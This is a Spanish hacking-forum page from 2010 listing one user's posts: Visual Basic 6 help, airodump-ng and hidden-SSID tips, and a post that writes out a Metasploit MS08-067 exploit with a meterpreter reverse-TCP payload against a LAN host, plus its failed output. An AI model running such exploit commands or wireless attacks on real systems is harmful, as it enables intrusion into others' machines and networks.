elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 [3] 4 5
21  Programación / Programación Visual Basic / Re: [AYUDA] VB 6 en: 4 Septiembre 2010, 23:13 pm
Como ya te dijo BlackZeroX debes leer mas, en google salen buenos tutoriales del vb6.
Código
  1. Private Sub Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
  2. 'tu codigo
  3. End sub

Espero que sirva, y si no busca que hay muchos ejemplos por el foro jorge ;)

Saludos
22  Programación / Programación Visual Basic / Re: [AYUDA] VB 6 en: 4 Septiembre 2010, 22:57 pm
Debes usar el evento QueryUnload, saludos!
23  Programación / Programación Visual Basic / Re: [AYUDA] VB 6 en: 4 Septiembre 2010, 22:50 pm
Usa End.
Código
  1. Private Sub nombredelbotonx_click()
  2. Kill (":C\miarchivo.txt")
  3. End 'Cierra el exe
  4. end sub

Saludos

Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje.
24  Seguridad Informática / Wireless en Linux / Re: Problema con airoscript: beacon=0, PWR=-1, ESSID=<length: 0> en: 4 Septiembre 2010, 21:55 pm
Buenas, puedes echar un vistazo aqui si tienes problemillas de este tipo:
http://www.aircrack-ng.org/documentation.html

Citar
Hidden SSIDs "<length: ?>"

You will sometimes see ”<length: ?>” as the SSID on the airodump-ng display. This means the SSID is hidden. The ”?” is normally the length of the SSID. For example, if the SSID was “test123” then it would show up as ”<length: 7>” where 7 is the number of characters. When the length is 0 or 1, it means the AP does not reveal the actual length and the real length could be any value.

To obtain the hidden SSID there are a few options:

    *
      Wait for a wireless client to associate with the AP. When this happens, airodump-ng will capture and display the SSID.
    *
      Deauthenticate an existing wireless client to force it to associate again. The point above will apply.
    *
      Use a tool like mdk3 to bruteforce the SSID.
    *
      You can use Wireshark combined with one or more of these filters to review data capture files. The SSID is included within these packets for the AP.
En la version en castellano no esta esta parte, se entiende bastante, sino usa el traslator :P

Yo en esos casos ahora uso el wireshark, mirate un tuto que es de esta pagina que esta muy bien, filtras a "AP2" concretamente los data y ve mirando uno por uno, ahi aparece el SSID.

Saludos.

Sorry pero vi tarde la fecha..
25  Seguridad Informática / Wireless en Windows / Re: Generador por defecto para router de YA.COM (WLANXXXXXX / YACOMXXXXXX) en: 4 Septiembre 2010, 02:43 am
 ;-)  ;-)  ;-)
26  Seguridad Informática / Wireless en Linux / Re: Ayuda para crackear red WPA en: 3 Septiembre 2010, 03:59 am
Estas en lo cierto kakanariu
27  Seguridad Informática / Hacking Wireless / Re: Falsa asociación sin éxito. Una manita porfavor! en: 29 Agosto 2010, 14:48 pm
Yo he realizado algún ataque con falsa auth y no tuve "ningún" problema, quizas es por falta de señal nose di algo mas y tal, saludos!

PD: Y las unicas veces que tuve problemas xD creo que sería por poca señal.
28  Seguridad Informática / Wireless en Linux / Re: Como conectar 2 pc's atraves de router en: 29 Agosto 2010, 03:40 am
Buenas, usando nmap contra un XP SP3, con firewall activado y eset nod32 4.2, me dice que estan filtrados los puertos en cuestion.
Hago trampas  :laugh: y desactivo un rato el firewall, mientras nessus hace el scaneo.
Me saca varias vulnerabilidades, una en concreto alta, pero a la hora de montar todo con el meta me tira esto :O

Código:
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.34
set LHOST 192.168.1.33
set SMBPIPE srvsvc
set EXITFUNC thread
set target 45
exploit
Resultado:
  • Started reverse handler on 192.168.1.33:4444
  • [-] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
  • Exploit completed, but no session was created.

Y al usar como payload:
Código:
windows/vncinject/reverse_tcp
Me dice que expiró el tiempo [con el firewall activado] y el mismo error sin el firewall.

_________________________________________________________________________

PD: Tengo el scan hecho por nessus y para que no meta la pata con que exploit utilizar he creado una db, lo tengo todo apunto excepto lo mas importante y esque el nessus no me genera los .neb solo me genera .nessus, .nessus (v1) y html ¿Como hago para que me saque los necesarios .neb? ¿puedo pasar cualquiera de los tres formatos que me deja a .neb?...;)


Si a alguien se le ocurre algo estoy por aqui un rato ;)
Saludos
29  Seguridad Informática / Wireless en Linux / Re: Me dice que no queda espacio en backtrack 4 R1 en: 28 Agosto 2010, 19:03 pm
Buenas:
Abre la konsola y escribe:
Código:
cd ..
cd mnt
dir
Ahi tienes usb's, discos duros...
si pones ahora:
Código:
cd hda1
dir
Veras cosas tuyas de windows xp.
Una vez ahi, escribe lo que te pusieron:
Código:
airodump-ng -w captura.cap -c CANAL --bssid BSSID INTERFAZ

Saludos

PD: http://usemoslinux.blogspot.com/2010/06/comandos-utiles-para-linux,html Sustituye "," por "."
Fijate sobre todo en el apartado Otros, casi al final de la página.
30  Seguridad Informática / Wireless en Linux / Re: Como conectar 2 pc's atraves de router en: 28 Agosto 2010, 15:07 pm
Buenas, ok probaré. Ahora lo estoy haciendo en un XP sp3 y no esta muy actualizado asique me imagino que en cuanto pueda hacerlo, necesito conectarme al router, saldrán mas cosillas xD
Código:
Lspci:
Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller
Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network

Airmon-ng:
Chipset: Atheros
Driver: ath5k - [phy0]

Saludos

PD: Esto me importa pero de momento estoy haciendo todo casero y puedo conectar dos pc sin problemas.
Páginas: 1 2 [3] 4 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines